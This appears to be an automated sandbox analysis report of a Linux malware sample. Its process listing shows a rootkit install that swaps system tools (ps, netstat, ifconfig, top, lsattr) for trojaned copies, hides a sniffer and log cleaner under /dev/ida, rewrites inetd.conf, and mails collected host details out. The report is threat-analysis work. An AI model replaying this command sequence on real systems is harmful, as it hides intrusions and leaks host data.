Analysis Overview
SHA256
522a265328fefca0a92ab30be590802539eb625b536931fe3be5f1e816276954
Threat Level: Shows suspicious behavior
The file 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Enumerates running processes
Virtualization/Sandbox Evasion: Time Based Evasion
Reads CPU attributes
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-21 05:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-21 05:39
Reported
2024-10-21 05:41
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
2s
Max time network
129s
Command Line
Signatures
Enumerates running processes
Virtualization/Sandbox Evasion: Time Based Evasion
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/uptime | N/A |
| N/A | N/A | /usr/bin/uptime | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/15/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/161/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/245/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1063/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1121/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/164/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/172/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1121/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/14/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/997/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1140/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1177/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/526/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1163/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1259/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/526/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1142/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1317/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/663/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1171/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/killall | N/A |
| File opened for reading | /proc/36/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1059/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/610/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1180/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/36/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/650/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/27/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/414/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/431/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1101/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/428/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1135/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1258/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/438/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/485/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/333/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/9/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/10/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/761/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1502/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/80/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/115/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1086/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/166/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/115/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/165/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/525/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/35/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1240/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1379/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1073/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1316/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1342/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/325/cmdline | /usr/bin/killall | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/grep | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/mv | N/A |
| N/A | N/A | /sbin/ifconfig | N/A |
| N/A | N/A | /bin/grep | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/mv | N/A |
| N/A | N/A | /sbin/ifconfig | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/computer | /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 | N/A |
Processes
/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]
/usr/bin/clear
[clear]
/bin/chown
[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 config-err-ESwDdV netplan_1iwncm7z snap-private-tmp ssh-GMXqXanC5C0k systemd-private-1020e78908244756830a6344ed1599c8-ModemManager.service-zJco20 systemd-private-1020e78908244756830a6344ed1599c8-bolt.service-lYyowF systemd-private-1020e78908244756830a6344ed1599c8-colord.service-J3gw7N systemd-private-1020e78908244756830a6344ed1599c8-systemd-resolved.service-9XdSFd systemd-private-1020e78908244756830a6344ed1599c8-systemd-timedated.service-hjXspn]
/bin/rm
[rm -rf /sbin/ifconfig]
/bin/mv
[mv ifconfig /sbin/ifconfig]
/bin/rm
[rm -rf /bin/netstat]
/bin/mv
[mv netstat /bin/netstat]
/bin/rm
[rm -rf /bin/ps]
/bin/mv
[mv ps /bin/ps]
/bin/rm
[rm -rf /usr/bin/top]
/bin/mv
[mv top /usr/bin/top]
/bin/cp
[cp -f mkxfs /usr/sbin/]
/usr/bin/touch
[touch /dev/rpm]
/usr/bin/touch
[touch /dev/last]
/bin/mkdir
[mkdir -p /dev/ida/.drag-on]
/bin/mkdir
[mkdir -p /dev/ida/.. ]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]
/bin/rm
[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]
/usr/bin/touch
[touch /dev/ida/.drag-on/tcp.log]
/usr/bin/touch
[touch /dev/ida/.. /tcp.log]
/bin/cp
[cp -f inetd.conf /etc]
/bin/cp
[cp -f services /etc]
/usr/bin/killall
[killall -HUP inetd]
/bin/rm
[rm -rf /usr/bin/lsattr]
/bin/cp
[cp -f lsattr /usr/bin/]
/bin/chmod
[chmod 500 /usr/bin/lsattr]
/usr/bin/chattr
[chattr +i /usr/bin/lsattr]
/usr/bin/lsattr
[/usr/bin/lsattr]
/bin/sleep
[sleep 1]
/bin/uname
[uname -a]
/bin/hostname
[hostname -f]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/grep
[grep vendor_id]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep model]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep MHz]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/bin/cat
[cat /proc/cpuinfo]
/bin/df
[df -h]
/bin/cat
[cat computer]
/bin/cat
[cat computer]
/bin/rm
[rm -rf last lk.tgz computer lk.tar.gz]
/usr/bin/clear
[clear]
/bin/chown
[chown root.root bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv swapfile sys tmp usr var vmlinuz vmlinuz.old]
/bin/rm
[rm -rf /sbin/ifconfig]
/bin/mv
[mv ifconfig /sbin/ifconfig]
/bin/rm
[rm -rf /bin/netstat]
/bin/mv
[mv netstat /bin/netstat]
/bin/rm
[rm -rf /bin/ps]
/bin/mv
[mv ps /bin/ps]
/bin/rm
[rm -rf /usr/bin/top]
/bin/mv
[mv top /usr/bin/top]
/bin/cp
[cp -f mkxfs /usr/sbin/]
/usr/bin/touch
[touch /dev/rpm]
/usr/bin/touch
[touch /dev/last]
/bin/mkdir
[mkdir -p /dev/ida/.drag-on]
/bin/mkdir
[mkdir -p /dev/ida/.. ]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]
/bin/rm
[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]
/usr/bin/touch
[touch /dev/ida/.drag-on/tcp.log]
/usr/bin/touch
[touch /dev/ida/.. /tcp.log]
/bin/cp
[cp -f inetd.conf /etc]
/bin/cp
[cp -f services /etc]
/usr/bin/killall
[killall -HUP inetd]
/bin/rm
[rm -rf /usr/bin/lsattr]
/bin/cp
[cp -f lsattr /usr/bin/]
/bin/chmod
[chmod 500 /usr/bin/lsattr]
/usr/bin/chattr
[chattr +i /usr/bin/lsattr]
/usr/bin/lsattr
[/usr/bin/lsattr]
/bin/sleep
[sleep 1]
/bin/uname
[uname -a]
/bin/hostname
[hostname -f]
/bin/grep
[grep inet]
/sbin/ifconfig
[/sbin/ifconfig]
/usr/bin/uptime
[uptime]
/bin/grep
[grep vendor_id]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep model]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep MHz]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/bin/cat
[cat /proc/cpuinfo]
/bin/df
[df -h]
/bin/cat
[cat computer]
/bin/cat
[cat computer]
/bin/rm
[rm -rf last lk.tgz computer lk.tar.gz]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| GB | 89.187.167.2:443 | tcp |
Files
/dev/rpm
| MD5 | 4e6ac6c2a2fecfe1e88ed9ef72c2d2cd |
| SHA1 | 76015ef9244670de728b830ad330c536f42c4e39 |
| SHA256 | 625d8ffa241021399ea6cf2f8f6ceaa5b19bee660bed532ef6c7dbead906917c |
| SHA512 | 1c8c0e2a26bb9cbef13ececacda94d9e8403646eb120596540bf040e672338b5c21333f1172d1822b5c87419a35437ea111324c5b0e3196d35407acf74e544f7 |
/dev/rpm
| MD5 | 7d298531c8d0893706bf9c76a40f8386 |
| SHA1 | 36f5cc01e0b6bcac92aa01055f3eb1bf45bf36bf |
| SHA256 | 03d0ea06da1c004ba7e1ae10d04444e235a4b8cf8451d610f771c539d1387f1a |
| SHA512 | 38f915c4921b801fe5b560fd9be4bc92705ee1376812f377d15a41bf2424f7e7324ea6cc6e103acee23940a4a8c93f1829a2b20fd5c3c22bb5542ce17d2ad973 |
/dev/rpm
| MD5 | 1894a58fd103ccce773c667411597492 |
| SHA1 | 248701dcabbff132054e34fd86f9afbd3746ea38 |
| SHA256 | 0b3158157a0891176e648dca6743c6f62c2a0ea6c5ba7f33bc8740ae42513d12 |
| SHA512 | c3c622fcac2163a71132dc706cf26b4e87912ee9fb13b593708d6c71c8a72fcca1b34bc97e6cf6f732308ac30475b2f047e2a315162f7314c24ae65413561f9a |
/dev/rpm
| MD5 | 1d0177d6d6d055555eb272249d89f54d |
| SHA1 | 6137ecd54c6ca43dbe4bc63a030b817a94a2a5e3 |
| SHA256 | cab38856d96e2273d9ca9e8eec5c4428dea21d90fcc1005d23d43db7508b9c9e |
| SHA512 | fad8ef62c3c5316497524e6c0101ed3e57b09ec892f902849d771d682b90430a6b7a588e1e10f8c93f01feb9f5f702bf1bcd5b8be2e12dfbcdbfec2b024e22ab |
/dev/rpm
| MD5 | a56a4ee13c1681711fb6217ec17a8abc |
| SHA1 | 6193fa49399265b3efbc7ec47760a23749a278a3 |
| SHA256 | 610c4e3a32f6e1fb38d082ed6ed86b1c0fcc42314df0e6d8f5c7ea70afb6dba4 |
| SHA512 | 86d576cf220f3a37ced1348aad2d799c692a13206d1709537123a7726174481ab9cb1fcf9f5046b072ff657e4becb0ae7ee83b8d5e18ef317930fe8de2cc0ec0 |
/dev/last
| MD5 | 29b9e96e561662774c048aaf62f63f99 |
| SHA1 | 0765b1eaf2054c54fe82e1326617d919f5f200fc |
| SHA256 | 76025f97d8ea5be475bad1e9ba9579059ef456583b63a71fcef9bbe055e865ec |
| SHA512 | 1db52eabbd3250a830155d0ad8b486c4dbe5fbf043f9bd45b6cf8982cae4c974e4cfe862f74824e091905b79d8cde6a6c6c71541a782aaf9e917282612eb457a |
/dev/last
| MD5 | ed90c163bc4809cfba41afe945d8c3ac |
| SHA1 | 3fc77c1038907a6540022911bb9f74ab260ed576 |
| SHA256 | 1b70087ed15d011f96f1c7ee24133cdb96fa80e07d9086bac204f46663ad9954 |
| SHA512 | a2ad80478649090d1294be13b410e2434a170aa027d1e5329c30ea805b8d8c5c0e8f018cd8183c7bd2bfe7fd4ed0cd351c8ac8e78503f250cc352726a4442917 |
/dev/last
| MD5 | 81ef1d399417bc7c03d5454d426e0e30 |
| SHA1 | e830de7de2fedc8688ded4335b6be7f0dcc2cf13 |
| SHA256 | 6fff47dbd5fd120ab99a02baa33485f872f066beb802da8a594dabfcd43ae89b |
| SHA512 | 89551b76b13cecc8e295a11b0c9e7a334e2448202461a58f1dd14398a9f92d9b56089b285e3cfae9b950b88dc8f8aa48a812cef8bd1aa6696be51edb62adfbeb |
/dev/last
| MD5 | ea4abc4909616408ea03fca58e9daf78 |
| SHA1 | c368533d40cbcf2d43c2b0f493bced7496fedafd |
| SHA256 | 574eb71079a9afe0d64c42a205368f6df46e1de0c98d28e3ba145045dba86ced |
| SHA512 | 92a1b480592675ff260a8659c179e788e50fbc846562ac2dbe9f5f11fbfd8bb6b3d2574c9c51a2f08ea506e5b719d4ca528ae5a1a51dd6a930425462eee4ab75 |
/dev/last
| MD5 | a2e384cb9bf939430cc6d44800052952 |
| SHA1 | 3cafe08a106154033956aa6bbf2605e0ac94c290 |
| SHA256 | 89558b7545ed41e4938774fac4e78696d61eb06a6f20755a2aa056becf3f8532 |
| SHA512 | 61aae5e24e101efab9db03dd6118fc95252c39088310b1d1172738565a456bb11d9a5ad84df82b2346d0ba4aae10f798889fe566c4a44e48f3a376f279d72058 |
/tmp/computer
| MD5 | 74b613a2b176f69fe5c1e8d954eab63a |
| SHA1 | 12cb70fe1ffa49af49c298b543457662dc03abfc |
| SHA256 | 642aaf59eddd25f2db9dcbb56abbfbaadf44f6a56c0cdae642f29d4fb99aa10f |
| SHA512 | 54aae87c0c4104844a5900e29c38be09fa6f5e542ed63110d706cf85b208197d737397ca34eec88b1d04082ae5219651ebe7781cf60d1316a31c41165f760bda |
/tmp/computer
| MD5 | 0e60c2ce6cd47252c914ff3178290d15 |
| SHA1 | 793e6bdb39acd41403f09ab838d4b0ed484898a7 |
| SHA256 | fc3631bac155e2062dcfa1f7208da8a0ea1bf137bf9dbe38f291a04c777cf106 |
| SHA512 | adeb4ab5f385df28a1a5d26c652ba08cd1b02daedf47dd5089a23f26d38fc40a6c8738dd3c08c611440751045a69004aa4b1b4da3e0d02613f366698be8a21b6 |
/tmp/computer
| MD5 | b411c1efe8afb4fc961fd64b8d6bfe35 |
| SHA1 | 696a2b6b186b2cd349f34196aa18ae30f297207d |
| SHA256 | c24169b2463eb9ea0ad37721d2cb7c429b90c5d436b71ad32052c814951c57ae |
| SHA512 | ae647a8186c201e08695c6b3bc1a89c5dfe59fe21d7e4584d98ea4855cf02c66ede247b08ac7820ceaf60cb5bae7475bccc315f7e791940d3fd3e5353a9d42eb |
/tmp/computer
| MD5 | e65718451e7f82b785a62b4dbb2dfe68 |
| SHA1 | 2da2a421d8cd9bc35f9f2722dbce3b8c28e724f9 |
| SHA256 | 25ed323c38ba36d3768f8c1bb1a67f9326e2b6e6b49a3cfe978f553547442005 |
| SHA512 | cac0ef0d8827fbae52525d4142d15a0df5ce987b32c441329601c3958387c1383cd57386b80d73345358a03fe2e9fe4885359af7978f18d654c9ff9cab60c0c4 |
/tmp/computer
| MD5 | c67f98b628b6ebae60f90357a88bae58 |
| SHA1 | 312f8128b79009ed53cef92debefbf31fd5f24b4 |
| SHA256 | 02f39a0d057762b6622a8143bde2fc99474f1d8adc424bc39954e3708525d04b |
| SHA512 | f1b7120165ca294fdc6695b6f76df9908e844ebc4bea44d010e3f963f13791afb5878ccf7e59e8ff0c76ca19e609dc600018c76784fbfccc64f82c0c03908bb1 |
/tmp/computer
| MD5 | 677a328e881f15f87509a110101a558a |
| SHA1 | 24f19a9ad1061bd54522ef4ebbfe6a63355472b6 |
| SHA256 | c006a0ae3ed9e83412e4231c98c23095ea47f2a7a5daa1dae68a66a7136de26b |
| SHA512 | e39f7af709956680221277326d493bb58d0fd4666fedfebcd3ef554b8882782bf1787c8a9c35c8e8373fe5a47b617ec9f6bf6ab7c7cf68da3a1a4ed62604d1bb |
/computer
| MD5 | 1a82e4272e1c87385b059ebf8fd52572 |
| SHA1 | 6c37312c8e55e2744cd3ad6f90123cadfaab9b4f |
| SHA256 | 5677d976c62a498530ded5fb30a75ce7053ec8df2e0b100895d3e287099b4f73 |
| SHA512 | 3e3ce36da4d382d203c2e57b0d2a60a6ca06e84276789d45b87bca01c5957790b12616267110fa1c3ad2d118c7f99353b52c4fc667dc854d241d1d95f1206ada |
/computer
| MD5 | 859a800e55a211f6982b0411ba7421a9 |
| SHA1 | 215f7a2227c88d52e56cdd4ec5de93c433d94498 |
| SHA256 | 765d9173db6604d3d12dfff59628e66bbdd77e1360de5098991b187b545856f6 |
| SHA512 | 74504ed28ccaa638395dff595238094b33ad768d579c7a6162f027142fcbcff2cae057a37373f70c99c2cc95ccc37863a15fd95cc0a5e645a5efdefa45574d3a |
/computer
| MD5 | 49bb556f7073a5a0a9febdc2b99857b8 |
| SHA1 | d8f1c8d341e6fb668c99e99b5fafb7a929602cc7 |
| SHA256 | 25351496d9265f403fe0324d7637c6a8963ee39bf89a467e4e20ef952049b864 |
| SHA512 | a98993b63bbe9907b428c5f3cce23785066e66141a9fceb471667c9280483404e820516ac7b07e1239d597a1fed34b2b0a8a5c74aad0bbc4c6d0f10061004bee |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-21 05:39
Reported
2024-10-21 05:41
Platform
debian9-armhf-20240611-en
Max time kernel
43s
Max time network
46s
Command Line
Signatures
Enumerates running processes
Virtualization/Sandbox Evasion: Time Based Evasion
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/uptime | N/A |
| N/A | N/A | /usr/bin/uptime | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/killall | N/A |
| File opened for reading | /proc/11/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/106/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/23/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/131/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/167/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/662/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/450/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/795/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/260/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/261/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/409/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/300/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/665/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/409/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/607/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/15/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/402/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/657/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/9/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/104/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/645/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/753/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/277/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/645/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/141/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/645/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/644/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/330/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/650/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/41/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/650/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/9/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/265/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/644/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/651/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/14/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/23/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/43/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/104/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/killall | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /sbin/ifconfig | N/A |
| N/A | N/A | /bin/grep | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/mv | N/A |
| N/A | N/A | /sbin/ifconfig | N/A |
| N/A | N/A | /bin/grep | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/mv | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/muKWvbYf | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muNx9kPc | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muXDXqrW | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muAm1Fpy | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muJkovri | /usr/bin/mail | N/A |
| File opened for modification | /tmp/computer | /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 | N/A |
| File opened for modification | /tmp/muHKzgkJ | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mumtFuBb | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mutly4gS | /usr/bin/mail | N/A |
Processes
/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]
/usr/bin/clear
[clear]
/bin/chown
[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 systemd-private-5c956e0ac026463aa2ef8d8a8e193d3d-systemd-timedated.service-d1hXTd]
/bin/rm
[rm -rf /sbin/ifconfig]
/bin/mv
[mv ifconfig /sbin/ifconfig]
/bin/rm
[rm -rf /bin/netstat]
/bin/mv
[mv netstat /bin/netstat]
/bin/rm
[rm -rf /bin/ps]
/bin/mv
[mv ps /bin/ps]
/bin/rm
[rm -rf /usr/bin/top]
/bin/mv
[mv top /usr/bin/top]
/bin/cp
[cp -f mkxfs /usr/sbin/]
/usr/bin/touch
[touch /dev/rpm]
/usr/bin/touch
[touch /dev/last]
/bin/mkdir
[mkdir -p /dev/ida/.drag-on]
/bin/mkdir
[mkdir -p /dev/ida/.. ]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]
/bin/rm
[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]
/usr/bin/touch
[touch /dev/ida/.drag-on/tcp.log]
/usr/bin/touch
[touch /dev/ida/.. /tcp.log]
/bin/cp
[cp -f inetd.conf /etc]
/bin/cp
[cp -f services /etc]
/usr/bin/killall
[killall -HUP inetd]
/bin/rm
[rm -rf /usr/bin/lsattr]
/bin/cp
[cp -f lsattr /usr/bin/]
/bin/chmod
[chmod 500 /usr/bin/lsattr]
/usr/bin/chattr
[chattr +i /usr/bin/lsattr]
/usr/bin/lsattr
[/usr/bin/lsattr]
/bin/sleep
[sleep 1]
/bin/uname
[uname -a]
/bin/hostname
[hostname -f]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep vendor_id]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep model]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep MHz]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/bin/df
[df -h]
/bin/cat
[cat computer]
/usr/bin/mail
[mail -s placinte [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGZ-0000Bq-Hs]
/usr/bin/mail
